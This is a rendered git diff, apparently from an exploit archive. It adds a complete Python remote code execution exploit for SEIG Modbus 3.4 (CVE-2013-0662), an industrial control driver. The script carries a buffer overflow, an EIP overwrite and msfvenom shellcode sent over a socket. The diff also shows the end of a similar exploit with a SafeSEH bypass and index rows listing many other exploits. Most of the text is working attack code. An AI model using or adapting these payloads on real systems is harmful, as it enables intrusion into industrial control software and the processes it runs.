shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"
|
||||
|
||||
JUNK = "JUNK"*5202 # 20808 Bytes of JUNK
|
||||
|
||||
payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
|
||||
print "Payload length: "+str(len(payload))
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(con)
|
||||
s.send(payload)
|
||||
s.recv(10)
|
65
exploits/windows_x86/remote/45220.py
Executable file
65
exploits/windows_x86/remote/45220.py
Executable file
|
@ -0,0 +1,65 @@
|
|||
# Title: SEIG Modbus 3.4 - Remote Code Execution
|
||||
# Author: Alejandro Parodi
|
||||
# Date: 2018-08-17
|
||||
# Vendor Homepage: https://www.schneider-electric.com
|
||||
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
|
||||
# Version: v3.4
|
||||
# Tested on: Windows XP SP3
|
||||
# CVE: CVE-2013-0662
|
||||
# References:
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
|
||||
|
||||
import socket
|
||||
import struct
|
||||
|
||||
ip = "192.168.127.138"
|
||||
port = 27700
|
||||
con = (ip, port)
|
||||
|
||||
|
||||
####### MESSAGE ##########
|
||||
message_header = "\x00\x64"
|
||||
message_buffer = "A" * 0x5dc
|
||||
eip = struct.pack("<I", 0x7C9C167D)
|
||||
|
||||
# Shellcode generated with:
|
||||
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python
|
||||
# Shellcode Size: 189 bytes
|
||||
nopsleed = "\x90" * 100 # \x90 bad char bypass
|
||||
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
|
||||
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
|
||||
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
|
||||
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
|
||||
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
|
||||
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
|
||||
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
|
||||
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
|
||||
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
|
||||
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
|
||||
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
|
||||
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
|
||||
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
|
||||
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
|
||||
shellcode += "\xff\xd5\x63\x61\x6c\x63\x00"
|
||||
|
||||
message = message_header + message_buffer + eip + nopsleed + shellcode
|
||||
print "Message Len: " + hex(len(message)) + " bytes"
|
||||
##########################
|
||||
|
||||
######## PKG HEADER ######
|
||||
header_padding = "\x42\x42"
|
||||
header_buf_size = "\xFF\xFF"
|
||||
header_recv_len = struct.pack(">H", len(message))
|
||||
header_end = "\x44"
|
||||
|
||||
header = header_padding + header_buf_size + header_recv_len + header_end
|
||||
##########################
|
||||
|
||||
######## CRAFTING PAYLOAD ########
|
||||
payload = header + message
|
||||
print "Package Len: "+hex(len(payload)) + " bytes"
|
||||
##################################
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(con)
|
||||
s.send(payload)
|
|
@ -6055,6 +6055,10 @@ id,file,description,date,author,type,platform,port
|
|||
45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
|
||||
45219,exploits/windows_x86/dos/45219.py,"SEIG Modbus 3.4 - Denial of Service (PoC)",2018-08-20,"Alejandro Parodi",dos,windows_x86,27700
|
||||
45222,exploits/windows_x86-64/dos/45222.py,"Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
|
||||
45223,exploits/windows_x86-64/dos/45223.py,"Restorator 1793 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
|
||||
45226,exploits/windows_x86/dos/45226.py,"Prime95 29.4b7 - Denial Of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -16700,6 +16704,9 @@ id,file,description,date,author,type,platform,port
|
|||
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
|
||||
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
|
||||
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
|
||||
45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397
|
||||
45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
|
||||
45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -39817,3 +39824,7 @@ id,file,description,date,author,type,platform,port
|
|||
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
|
||||
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
|
||||
45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443
|
||||
45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80
|
||||
45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80
|
||||
45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,
|
||||
45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue